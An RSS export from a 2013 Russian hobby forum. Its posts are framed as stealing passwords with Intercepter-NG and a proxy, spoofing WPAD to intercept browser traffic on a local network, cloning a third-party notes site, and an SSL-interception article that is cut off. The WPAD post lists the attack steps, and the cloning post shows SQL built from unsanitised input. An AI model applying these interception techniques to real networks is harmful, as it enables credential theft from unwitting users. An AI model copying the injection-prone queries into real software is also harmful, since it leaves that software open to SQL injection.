<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
		<title>Всё про всё и ничего лишнего!</title>
		<link>http://wabsity.do.am/</link>
		<description>Форум</description>
		<lastBuildDate>Fri, 17 May 2013 01:37:55 GMT</lastBuildDate>
		<generator>uCoz Web-Service</generator>
		<atom:link href="https://wabsity.do.am/forum/rss" rel="self" type="application/rss+xml" />
		
		<item>
			<title>Воруем пароли с Помощью Прокси &amp; Intercepter-NG [VIDEO]</title>
			<link>https://wabsity.do.am/forum/3-76-1</link>
			<pubDate>Fri, 17 May 2013 01:37:55 GMT</pubDate>
			<description>Форум: &lt;a href=&quot;https://wabsity.do.am/forum/3&quot;&gt;Операционные Системы&lt;/a&gt;&lt;br /&gt;Описание темы: [VIDEO]YouTube+Софт В теме&lt;br /&gt;Автор темы: zloi_volk&lt;br /&gt;Автор последнего сообщения: zloi_volk&lt;br /&gt;Количество ответов: 0</description>
			<content:encoded>&lt;div align=&quot;center&quot;&gt;﻿﻿&lt;!--BBvideo--&gt;&lt;span id=&quot;scr06Zp1uD9Ci&quot;&gt;&lt;/span&gt;&lt;script type=&quot;text/javascript&quot;&gt;_uVideoPlayer({&apos;url&apos;:&apos;http://www.youtube.com/watch?v=KHvpVZtRQA0&apos;,&apos;width&apos;:&apos;425&apos;,&apos;height&apos;:&apos;355&apos;},&apos;scr06Zp1uD9Ci&apos;);&lt;/script&gt;&lt;!--/BBvideo--&gt;&lt;/div&gt;&lt;hr /&gt;&lt;div align=&quot;left&quot;&gt;&lt;span style=&quot;font-size:20pt;&quot;&gt;&lt;div align=&quot;center&quot;&gt;&lt;span style=&quot;color:#ff7700&quot;&gt;&lt;b&gt;SOFT&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;/span&gt;&lt;span style=&quot;font-size:13pt;&quot;&gt;&lt;br /&gt; ﻿&lt;a class=&quot;link&quot; href=&quot;http://wabsity.do.am/load/41-1-0-189&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Intercepter-NG 0.9.5&lt;/a&gt;&lt;/span&gt;&lt;/div&gt; &lt;br /&gt; &lt;a class=&quot;link&quot; href=&quot;http://wabsity.do.am/load/54-1-0-190&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;&lt;div align=&quot;left&quot;&gt;﻿&lt;span style=&quot;font-size:14pt;&quot;&gt;CCProxy 7.2 Build 20110328&lt;/span&gt;&lt;/div&gt;&lt;/a&gt;</content:encoded>
			<category>Операционные Системы</category>
			<dc:creator>zloi_volk</dc:creator>
			<guid>https://wabsity.do.am/forum/3-76-1</guid>
		</item>
		<item>
			<title>Перехват WEB трафика через протокол WPAD</title>
			<link>https://wabsity.do.am/forum/3-75-1</link>
			<pubDate>Thu, 16 May 2013 21:20:03 GMT</pubDate>
			<description>Форум: &lt;a href=&quot;https://wabsity.do.am/forum/3&quot;&gt;Операционные Системы&lt;/a&gt;&lt;br /&gt;Описание темы: при помощи Intercepter-NG&lt;br /&gt;Автор темы: zloi_volk&lt;br /&gt;Автор последнего сообщения: zloi_volk&lt;br /&gt;Количество ответов: 0</description>
			<content:encoded>WPAD — WebProxy Auto-Discovery. Протокол автоматического получения настроек прокси в локальной сети, поддерживается практически всеми веб-браузерами и рядом других приложений. &lt;br /&gt;&lt;br /&gt; В кратце суть его работы такова: если клиент использует DHCP для получения IP адреса, то и за урлом с настройкой прокси он обращается к своему DHCP серверу. Если DHCP не настроен на выдачу WPAD конфигурации или в сети не используется DHCP как таковой, то клиент пробует разрешить сетевое имя вида wpad.localdomain используя DNS. Если такое имя не найдено, то делается последняя попытка поиска имени &apos;WPAD&apos; через NetBios. Если имя не найдено, клиент пробует соединиться напрямую, но если кто-то в сети сказал что он имеет имя &apos;WPAD&apos;, то клиент соединяется по 80 порту на IP ответившего хоста и затем пытается загрузить файл wpad.dat, в котором должны находиться настройки прокси. &lt;br /&gt;&lt;br /&gt; С самого начала своего существования WPAD стал брешью в безопасности, потому что позволяет очень легко перехватить поток данных, выдавая себя за легитимный прокси сервер. Не смотря на то, что данная уязвимость существует давно и довольно легко эксплуатируется, эта атака не приобрела большой известности. Причин всего несколько.  &lt;br /&gt;&lt;br /&gt; Во первых она позволяет перехватывать только веб трафик клиента, и многим проще запустить arp poison и перехватить гораздо больше. Во вторых для ее осуществления хоть и не требуется каких-то сложных манипуляций, но все же необходимо запустить и настроить ряд сервисов: &lt;br /&gt;&lt;br /&gt; 1. Необходимо зарегистрировать в сети имя &apos;WPAD&apos;. &lt;br /&gt; 2. Необходимо запустить веб-сервер и создать файл wpad.dat. &lt;br /&gt; 3. Необходимо запустить прокси-сервер. &lt;br /&gt;&lt;br /&gt; Если на Unix это проделывается достаточно быстро, то на Windows выполнение подобных операций требует больше времени и усилий. Дополнительно возникает проблема с переименованием в сети. Довольно подозрительно будет выглядеть компьютер с именем &apos;WPAD&apos; в сетевом окружении, а если захочется применить инструмент вроде nbtool для того чтобы cкрытно отвечать на запросы имени &apos;WPAD&apos;, то придется остановить netbios ns службу Windows для освобождения 137 udp порта и соответственно отключиться от сети. &lt;br /&gt;&lt;br /&gt; Тем не менее, имеется большое количество потенциальных жертв в любой сети, потому что по умолчанию Internet Explorer (а соответственно и Chrome) пытаются автоматически получить настройки прокси средствами WPAD.  &lt;br /&gt;&lt;br /&gt; В Intercepter-NG проведение атаки на WPAD полностью автоматизировано и проходит за несколько секунд. &lt;br /&gt; Благодаря использованию WinPcap нет нужды прослушивать сокеты или переименовывать собственное netbios имя. Указывать конкретных жертв не требуется, выдача конфигурации происходит всем запросившим. &lt;br /&gt; На выбор можно вручную указать прокси сервер, который будет выдаваться клиентам или использовать встроенный socks. В последнем случае для перехвата трафика кроме самого Intercepter-NG больше ничего не требуется. &lt;br /&gt;&lt;br /&gt; &lt;b&gt;Демонстрация работы представлена на следующих видео роликах.&lt;/b&gt; &lt;br /&gt;&lt;br /&gt; &lt;div align=&quot;center&quot;&gt;&lt;!--BBvideo--&gt;&lt;span id=&quot;scr00fV1uD5AL&quot;&gt;&lt;/span&gt;&lt;script type=&quot;text/javascript&quot;&gt;_uVideoPlayer({&apos;url&apos;:&apos;http://www.youtube.com/watch?v=uB_UE7Wdsi0&apos;,&apos;width&apos;:&apos;425&apos;,&apos;height&apos;:&apos;355&apos;},&apos;scr00fV1uD5AL&apos;);&lt;/script&gt;&lt;!--/BBvideo--&gt;&lt;/div&gt;﻿&lt;div align=&quot;center&quot;&gt;&lt;!--BBvideo--&gt;&lt;span id=&quot;scr10fV1uD5AL&quot;&gt;&lt;/span&gt;&lt;script type=&quot;text/javascript&quot;&gt;_uVideoPlayer({&apos;url&apos;:&apos;http://www.youtube.com/watch?v=GDu-T0cTK_U&apos;,&apos;width&apos;:&apos;425&apos;,&apos;height&apos;:&apos;355&apos;},&apos;scr10fV1uD5AL&apos;);&lt;/script&gt;&lt;!--/BBvideo--&gt;&lt;/div&gt;</content:encoded>
			<category>Операционные Системы</category>
			<dc:creator>zloi_volk</dc:creator>
			<guid>https://wabsity.do.am/forum/3-75-1</guid>
		</item>
		<item>
			<title>методика полного копирования сайта</title>
			<link>https://wabsity.do.am/forum/3-74-1</link>
			<pubDate>Wed, 15 May 2013 21:49:43 GMT</pubDate>
			<description>Форум: &lt;a href=&quot;https://wabsity.do.am/forum/3&quot;&gt;Операционные Системы&lt;/a&gt;&lt;br /&gt;Описание темы: методика полного копирования сайта&lt;br /&gt;Автор темы: zloi_volk&lt;br /&gt;Автор последнего сообщения: zloi_volk&lt;br /&gt;Количество ответов: 0</description>
			<content:encoded>&lt;span style=&quot;font-size:8pt;&quot;&gt;Сервис онлайн-записочек очень прост, и эта простота дьявольски притягивает. После захода на сайт весь экран браузера становится пустым. Если нажать на пустом месте, то появится «клейкий листочек» - некий квадратик, в котором можно писать текст и затем его редактировать. Также, в углу есть маленький квадратик, нажимая на который можно менять цвет листочка. И есть крестик, которым удаляется записочка. Весь интерфейс выполнен с использованием AJAX, и страница при работе не перегружается. Рабочая поверхность, на которой находятся записочки, называется «доска» (board) и имеет уникальный идентификатор, что отображается в URL. Эту информацию я рассказал, потому что без нее сложно понять статью. Оптимальным вариантом будет, если перед прочтением следующих абзацев ты зайдешь на сайт и сам испробуешь функционал.&lt;/span&gt; &lt;br /&gt; Возрождение старой методики &lt;br /&gt;&lt;br /&gt; Вернемся к рассмотрению мега-старой методики, которая сейчас снова возрождается. Раньше все сайты были статическими - состояли из HTML-файлов и картинок. Это добро отдавалось браузеру полностью для отображения. Чтобы скопировать сайт с потрохами, нужно было лишь запустить программу, которая открывает все ссылки на сайте и сохраняет все, что отдает сервер. Но затем в мир Веба пришла динамика, и копирование сайта стало задачей чрезвычайно трудной. К примеру, форум с сообщениями. Даже если по нему пройдется бот и сохранит все страницы, – это ничего не даст. Практически весь функционал заброшен в скрипты, которые остаются для нас закрытыми. При этом, тенденции к упрощению функционала не наблюдается и, казалось бы, скопировать сайт стало невозможно. Но тут пришла эра Веб 2.0! Одним из ее аспектов является перенос большой части функционала с серверного уровня на браузерный, на JavaScript... – а ведь он отдается нам в открытом виде! Чем больше система будет работать на стороне браузера, тем меньше кода на сервере – то есть, скрытого от нас кода. Этот маленький участок кода, который можно и самому дописать, – мелочь по сравнению с той частью, что мы без проблем скопируем. Теория может показаться немного непонятной, но после практики все встанет на свои места. &lt;br /&gt;&lt;br /&gt; Итак, в качестве примера мной был выбран сайт zapisochki.ru. Много функциональности в нем находится на стороне JavaScript, а на стороне сервера лишь выполняются несколько запросов по сохранению, обновлению и удалению клейких листочков. Если попытаться эмулировать эти запросы, то можно полностью скачать с сайта все остальное. Правда, сначала нужно понять, как работает приложение, какими командами обменивается серверная и клиентская часть, как генерируется первая страница и т.п. Пошагово пройдемся по всему процессу полного клонирования. &lt;br /&gt; Инструменты &lt;br /&gt;&lt;br /&gt; &lt;b&gt;Чтобы разобраться с работой сайта, воспользуемся FireFox с установленными тремя плагинами: &lt;br /&gt; Temper Data (https://addons.mozilla.org/en-US/firefox/addon/966) для просмотра, перехвата и изменения запросов; &lt;br /&gt; Web Developer (https://addons.mozilla.org/en-US/firefox/addon/60) для отключения кеша браузера, для просмотра и удаления кукисов; &lt;br /&gt; FireBug (https://addons.mozilla.org/en-US/firefox/addon/1843) для отладки JavaScript и анализа запросов.&lt;/b&gt; &lt;br /&gt;&lt;br /&gt; Также необходим Offline Browser для скачивания всего сайта (триальная версия есть на www.metaproducts.com/mp/Portable_Offline_Browser.htm или у нас на диске). &lt;br /&gt; Этапы копирования &lt;br /&gt;&lt;br /&gt; Копирование сайта «Записочки» состоит со следующих этапов: &lt;br /&gt; Анализ и эмуляция идентификации; &lt;br /&gt; Копирование страницы с записочками; &lt;br /&gt; Анализ протокола обмена клиентской части с серверной; &lt;br /&gt; Анализ генерации главной страницы; &lt;br /&gt; Программинг серверной части. &lt;br /&gt;&lt;br /&gt; В результате мы получим полностью рабочий сайт zapisochki.ru у себя на локальном сервере. &lt;br /&gt; Анализ идентификации &lt;br /&gt;&lt;br /&gt; Перед копированием разберемся с идентификацией юзера, ведь у каждого своя страница с клейкими листочками, и нужно знать, какому юзеру какие записочки отображать. Перед началом анализа я, с помощью плагина Web Developer, удалил все кукисы для чистоты эксперимента. Включив Temper Data, я загрузил zapisochki.ru, – на что сервер вернул код переадресации 302 на zapisochki.ru/много_цифр/, да и еще бросил кукисы с каким-то логином и паролем. Я попробовал удалить пришедшие кукисы и загрузил zapisochki.ru/много_цифр/. Даже без логина и пароля, что были в кукисах, страничка нормально отобразилась. Делаем вывод, что идентификация происходит именно по этих циферкам в URL, а логин и пароль требуются лишь для внутренних нужд сайта. &lt;br /&gt;&lt;br /&gt; Теперь можно копировать сайт и реализовать идентификацию. Для этого я быстро создал на Денвере хост с многозначительным названием «z». Для эмуляции главной странички – набросал скрипт, который при заходе на сайт «z» будет проверять кукисы. Если они есть, то, исходя из них, юзер будет переброшен на ту доску, которая прописана у него в кукисах. &lt;br /&gt;&lt;br /&gt; Таким образом, если в оригинале в кукисах хранятся логин и пароль, по которым уже показываются записочки, то мы немного все упростим и будем хранить идентификатор доски. Записочки будут привязаны к этому идентификатору. Да, это не совсем правильно со стороны безопасности, но нам главное получить рабочий сайт, а доводкой уже можно заниматься потом. &lt;br /&gt;&lt;br /&gt; Итак, мы можем написать маленький скрипт, который будет эмулировать идентификацию, как указано выше. Этим скриптом мы эмулировали функциональность, связанную с идентификацией. Пора приступить к следующему этапу. &lt;br /&gt; Offline Explorer в работе &lt;br /&gt;&lt;br /&gt; Рассмотрим копирование функциональности самих листочков. Перейдем на сайт zapisochki.ru/много_цифр/, создадим несколько разных записок и попробуем скопировать HTML-страницу со всей обвязкой. Конечно, можно все это и вручную проделать, – смотреть, какие файлы загружаются вместе со страничкой, и потом их копировать по одному – но лучше воспользоваться инструментом для создания фейков, а именно Offline Browser. Запустим его и в качестве исходного URL зададим zapisochki.ru/много_цифр/. Пара кликов на Next – и сайт полностью сохранен. После этого воспользуемся функцией экспорта и сохраним результат. В каталоге экспорта появилась папка с названием zapisochki.ru, а в ней, в папке themes, – все нужные картинки, скрипты и пр. Также там есть папка «много_цифр», а в ней один файлик с названием default.htm. &lt;br /&gt;&lt;br /&gt; Далее я скопировал в Денвер папки themes и «много_цифр», а default.htm переименовал на index.php. Если зайти в браузере на &lt;a class=&quot;link&quot; target=&quot;_blank&quot; href=&quot;https://wabsity.do.am/go?http://z/много_буковок/,&quot; title=&quot;http://z/много_буковок/,&quot; rel=&quot;nofollow&quot;&gt;http://z/много_буковок/,&lt;/a&gt; то отобразится страничка с нашими закладками, правда, не все пока работает. Почему-то не двигаются закладки. Сейчас исправим… &lt;br /&gt; FireBug vs. Offline Explorer &lt;br /&gt;&lt;br /&gt; Откроем наш FireBug и активируем весь функционал, например, нажав на вкладке «Net». Поставим везде галочки и нажмем «Применить». Теперь, когда перейдем на вкладку «Console», там пишется что-то типа «ошибка с dragdrop». Тут нужно отлаживать JavaScript, смотреть, в чем проблема, но я воспользовался другой методикой, и она сработала! Я открыл скачанный default.htm и в поиске ввел «dragdrop» - курсор переместился на строчку: &lt;br /&gt;&lt;br /&gt; &lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;&lt;script &lt;br /&gt;&lt;br /&gt; src=&quot;../scriptaculous.js@load=effects,dragdrop&quot; &lt;br /&gt;&lt;br /&gt; type=&quot;text/javascript&quot;&gt;&lt;/script&gt;&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt; &lt;br /&gt;&lt;br /&gt; Сразу в глаза бросается, что после scriptaculous.js идет «@», хотя в теории должен быть «?» (это же Get-запрос). Понятно, что так сделал Offline Browser, чтобы превратить динамически сайт в статический, но нам оно не нужно. Поэтому возвращаем все назад и заменяем «@» на «?», а файл scriptaculous.js@load=effects,dragdrop переименуем в изначальный - scriptaculous.js. После этого мы увидим, что во вкладе Net в FireBug появились две ошибки номер 404, то есть, двух файлов не было обнаружено, а именно: &lt;br /&gt;&lt;br /&gt; &lt;b&gt;effects.js &lt;br /&gt;&lt;br /&gt; dragdrop.js&lt;/b&gt; &lt;br /&gt;&lt;br /&gt; Достать их не проблема! Смотрим в FireBug пути, загружаем с сервера записочек и сохраняем к остальным скриптам. Обновимся и увидим, что все отобразилось, ошибок нет, да и к тому же, все функции с записочками стали нормально работать. Один из этапов выполнен. &lt;br /&gt; Удаление лишнего &lt;br /&gt;&lt;br /&gt; Красоту немного портит «разьехавшийся» дизайн – будем исправлять! Если нажать на «инспектора» в FireBug и навести на наше меню, то увидим, что это все одна таблица. Нам ее не жалко, заходим в исходник страницы и удаляем все между тегами &lt;table&gt;, да и сами теги также. После обновления наблюдаем идеальный минималистский дизайн. &lt;br /&gt;&lt;br /&gt; Но в «Console» FireBug опять появились ошибки. На этот раз – в файле sticker.js. Также там возле ошибки указывается номер проблемной строки. Если перейти на нее, а потом удалить строку, то после обновления ошибки больше не будет. Вот так, иногда удаление бывает эффективнее создания. &lt;br /&gt; Протокол обмена &lt;br /&gt;&lt;br /&gt; Записочки двигаются, текст и цвет меняется, однако, все это не сохраняется. Давай разберемся в протоколе обмена, чтобы в будущем его эмулировать. Откроем наши записочки в FireBug с вкладкой Console. Будем пробовать записочки в действии. Нажмем на пустом месте – появляется пустая записка. Теперь введем любой текст и выставим цвет. Видим, что браузер послал запрос: &lt;br /&gt;&lt;br /&gt; &lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;Post &lt;br /&gt;&lt;br /&gt; board: 70012862175107245171625585615874 &lt;br /&gt;&lt;br /&gt; color: 1 &lt;br /&gt;&lt;br /&gt; id: &lt;br /&gt;&lt;br /&gt; text: sometext &lt;br /&gt;&lt;br /&gt; x: 123.1 &lt;br /&gt;&lt;br /&gt; y: 543.2&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt; &lt;br /&gt;&lt;br /&gt; Причем, переменная board берется с начала нашего файла default.htm, где есть строчка: &lt;br /&gt;&lt;br /&gt; &lt;b&gt;var board = &apos;70012862175107245171625585615874&apos;;&lt;/b&gt; &lt;br /&gt;&lt;br /&gt; Это важно, ведь потом данную строчку будет генерировать скрипт. Также видим, что id передается пустым, а в результате сервер возвращает число. Если изменить какой-то параметр записочки (цвет, расположения или текст), то посылается такой же запрос, только id становится не пустым. Из этого можно сделать вывод, что, если id пустое, то сервер создает в базе новую запись о записочке и возвращает клиенту ее идентификатор. В противном случае изменяются в базе параметры той записочки, идентификатор которой передается. Посмотрев на default.htm, видим строку: &lt;br /&gt;&lt;br /&gt; &lt;b&gt;var saveURL = &apos;../noteboard/save/&apos;;&lt;/b&gt; &lt;br /&gt;&lt;br /&gt; – она определяет путь к файлу, что обрабатывает сохранение, но мы его изменим на: &lt;br /&gt;&lt;br /&gt; &lt;b&gt;var saveURL = &apos;../save.php&apos;;&lt;/b&gt; &lt;br /&gt;&lt;br /&gt; Написанием этого файла займемся позже. Теперь рассмотрим удаление. Если нажать на крестик, то в FireBug появится такой запрос: &lt;br /&gt;&lt;br /&gt; &lt;b&gt;POST /NoteBoard/delete/37094&lt;/b&gt; &lt;br /&gt;&lt;br /&gt; Видим, что при удалении в запросе указывается id записочки. URL, по которому будет отослан запрос, так же, как и для сохранения хранится в default.htm: &lt;br /&gt;&lt;br /&gt; &lt;b&gt;var deleteURL = &apos;../noteboard/delete/&apos;;&lt;/b&gt; &lt;br /&gt;&lt;br /&gt; Хотя это несколько неудобно, ведь нужно настраивать .htaccess для таких запросов. Поэтому упростим алгоритм, изменив URL на: &lt;br /&gt;&lt;br /&gt; &lt;b&gt;var deleteURL = &apos;../delete.php?&apos;;&lt;/b&gt; &lt;br /&gt;&lt;br /&gt; С этого времени запросы всегда будут обращаться на файл delete.php, а id листочка –приходить как GET-параметр. Мы знаем протокол обмена между сервером и клиентом и уже можем написать сценарии save.php и delete.php, но оставим программерскую часть на потом. Ведь у нас осталась еще генерация первой страницы. То есть, когда уже страница загрузилась, дальше всю работу по прорисовке берет на себя JavaScript. Но первый раз страницу нужно генерировать. А именно – вверху, в переменную board, вписать тот идентификатор, по которому пришел юзер. &lt;br /&gt; Формирование записочек &lt;br /&gt;&lt;br /&gt; Если посмотреть в конец исходника default.htm, то можно увидеть следующее: &lt;br /&gt;&lt;br /&gt; &lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;&lt;form id=&quot;stickers&quot;&gt; &lt;br /&gt;&lt;br /&gt; &lt;textarea id=&quot;s36734&quot; &lt;br /&gt;&lt;br /&gt; style=&quot;left:61px;top:32px;z-index:1&quot;&gt; &lt;br /&gt;&lt;br /&gt; текст записочки 1&lt;/textarea&gt; &lt;br /&gt;&lt;br /&gt; &lt;textarea id=&quot;s36735&quot; &lt;br /&gt;&lt;br /&gt; style=&quot;left:90px;top:33px;z-index:0&quot;&gt; &lt;br /&gt;&lt;br /&gt; текст записочки 2&lt;/textarea&gt; &lt;br /&gt;&lt;br /&gt; &lt;/form&gt;&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt; &lt;br /&gt;&lt;br /&gt; Нам нужно взять из базы «записочки» данные и потом их выводить как textarea, где в стиле прописывать позицию в параметры left и top, в z-index писать цвет, а в id - идентификатор записочки. Также между тегами &lt;textarea&gt; надо вписать текст. &lt;br /&gt; Программирование &lt;br /&gt;&lt;br /&gt; Теперь мы знаем, как генерировать первую страницу, как обрабатывать AJAX-запросы от JavaScript и можем начать последний этап - программирование. В качестве языка был выбран PHP. &lt;br /&gt;&lt;br /&gt; Нам требуется сделать четыре файла: .htaccess, index.php, save.php, delete.php. В .htaccess пропишем правила перенаправления всех несуществующих каталогов к index.php (это нужно, чтобы перехватить запросы на адреса со многими циферками). Файл .htaccess будет следующим: &lt;br /&gt;&lt;br /&gt; &lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;RewriteEngine on &lt;br /&gt;&lt;br /&gt; RewriteCond %{REQUEST_FILENAME} !-f &lt;br /&gt;&lt;br /&gt; RewriteCond %{REQUEST_FILENAME} !-d &lt;br /&gt;&lt;br /&gt; RewriteRule ^(.*&amp;#41;$ index.php?$1 &amp;#91;L,QSA]&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt; &lt;br /&gt;&lt;br /&gt; Подумаем над проблемой хранения информации. Создадим в MySQL базу данных с одной простой таблицей и следующими полями, выбранными исходя из параметров записочки: &lt;br /&gt;&lt;br /&gt; &lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;id - integer, для хранения идентификатора записочки &lt;br /&gt; board - bigint, для хранения доски, в которой находится записочка &lt;br /&gt; color - tinyint, для хранения цвета &lt;br /&gt; x - float, для хранения x-координаты &lt;br /&gt; y - float, для хранения y-координаты &lt;br /&gt; text - varchar(255&amp;#41;, для хранения текста&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt; &lt;br /&gt; &lt;b&gt;Файл save.php очень простой. Он лишь должен уметь принимать Post-данные и генерировать запрос на создание новой записочки:&lt;/b&gt; &lt;br /&gt;&lt;br /&gt; &lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;INSERT INTO z SET `board`=&apos;$board&apos;, `text`=&apos;$text&apos;, `x`=&apos;$x&apos;, `y`=&apos;$y&apos;, `color`=&apos;$color&apos; &lt;br /&gt;&lt;br /&gt; – или запрос для обновления уже существующей: &lt;br /&gt;&lt;br /&gt; UPDATE z SET `board`=&apos;$board&apos;, `text`=&apos;$text&apos;, `x`=&apos;$x&apos;, `y`=&apos;$y&apos;, `color`=&apos;$color&apos; WHERE `id`=&apos;$id&apos; &lt;br /&gt;&lt;br /&gt; Ну а delete.php будет не сложнее: &lt;br /&gt;&lt;br /&gt; DELETE FROM z WHERE id=&apos;$id&apos; AND board=&apos;$board&apos;&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt; &lt;br /&gt; Файл index.php, как мы уже обсуждали, нужен для переадресации юзера по его кукисам на необходимую страничку. То есть, он будет «брать» идентификатор доски id, который хранится в кукисах, и выбирать с базы все соответствующие записочки, а дальше выводить тот файл, что мы получили от Offline Browser, и в нем между тегами &lt;form&gt; помещать записочки в формате, который мы определили выше. &lt;br /&gt; Все у наших ног &lt;br /&gt;&lt;br /&gt; На создание сайта у автора ушел, как минимум, месяц, а мы его скопировали за час. И таких сайтов сейчас очень много, так что простор для творчества огромен. Позволю себе напомнить, что вся информация представлена лишь для ознакомления. Если у тебя будут вопросы, то координаты найдешь на моем сайте &lt;a class=&quot;link&quot; target=&quot;_blank&quot; href=&quot;https://wabsity.do.am/go?http://tutamc.com.&quot; title=&quot;http://tutamc.com.&quot; rel=&quot;nofollow&quot;&gt;http://tutamc.com.&lt;/a&gt; Всегда с радостью отвечу и помогу. &lt;br /&gt;&lt;br /&gt; Вся информация, конечно же, представлена лишь в ознакомительных целях. Не нужно повторять глупости за автором :). &lt;br /&gt; WWW &lt;br /&gt; &lt;b&gt;Адрес нашего подопытного: &lt;a class=&quot;link&quot; target=&quot;_blank&quot; href=&quot;https://wabsity.do.am/go?http://zapisochki.ru.&quot; title=&quot;http://zapisochki.ru.&quot; rel=&quot;nofollow&quot;&gt;http://zapisochki.ru.&lt;/a&gt; &lt;br /&gt; Все дополнения к FireFox: &lt;a class=&quot;link&quot; target=&quot;_blank&quot; href=&quot;https://wabsity.do.am/go?https://addons.mozilla.org.&quot; title=&quot;https://addons.mozilla.org.&quot; rel=&quot;nofollow&quot;&gt;https://addons.mozilla.org.&lt;/a&gt; &lt;/b&gt;</content:encoded>
			<category>Операционные Системы</category>
			<dc:creator>zloi_volk</dc:creator>
			<guid>https://wabsity.do.am/forum/3-74-1</guid>
		</item>
		<item>
			<title>Вскрываем SSL. Перехват данных в защищенных соединениях</title>
			<link>https://wabsity.do.am/forum/3-73-1</link>
			<pubDate>Wed, 15 May 2013 21:45:36 GMT</pubDate>
			<description>Форум: &lt;a href=&quot;https://wabsity.do.am/forum/3&quot;&gt;Операционные Системы&lt;/a&gt;&lt;br /&gt;Описание темы: Вскрываем SSL. Перехват данных в защищенных соединениях&lt;br /&gt;Автор темы: zloi_volk&lt;br /&gt;Автор последнего сообщения: zloi_volk&lt;br /&gt;Количество ответов: 0</description>
			<content:encoded>Используя мейл, админку или систему электронного банкинга для управления своим счетом, мы полностью доверяемся серверу. Если все данные передаются по защищенному SSL-соединению - о чем радужно сообщает браузер - то и бояться вроде бы нечего. Но так ли это на самом деле? &lt;br /&gt;&lt;br /&gt; Простая истина: передавать данные в открытом виде – небезопасно. В этом случае они легко могут стать добычей злоумышленника, которому не составит труда перехватить, модифицировать и даже подменить их. Вот почему логины и пароли, а также другие конфиденциальные данные по обычному HTTP не передаются. Вместо этого используется защищенный HTTPS, который работает медленнее, но зато упаковывает данные в криптографический протокол SSL – и те передаются уже в зашифрованном виде. &lt;br /&gt;&lt;br /&gt; Как устроен SSL? &lt;br /&gt;&lt;br /&gt; Алгоритм работы SSL построен на использовании пары асимметричных ключей. Открытый ключ раздается всем желающим, и с его помощью шифруются необходимые данные, которые далее можно дешифровать только с помощью закрытого ключа (он есть на сервере). Открытый ключ предоставляется сервером клиенту, причем выдается в составе сертификата (подписывается третьей уполномоченной стороной – так называемым центром сертификации: certificate authority – CA). В любой сертификат входят следующие поля: &lt;br /&gt;&lt;br /&gt; НА ПЛАШКУ &lt;br /&gt;&lt;br /&gt; &lt;b&gt;* полное (уникальное) имя владельца сертификата &lt;br /&gt; * открытый ключ владельца &lt;br /&gt; * дата выдачи цифрового сертификата &lt;br /&gt; * дата окончания действия сертификата &lt;br /&gt; * полное (уникальное) имя издателя (источника сертификата) &lt;br /&gt; * цифровая подпись издателя&lt;/b&gt; &lt;br /&gt;&lt;br /&gt; Существует несколько видов 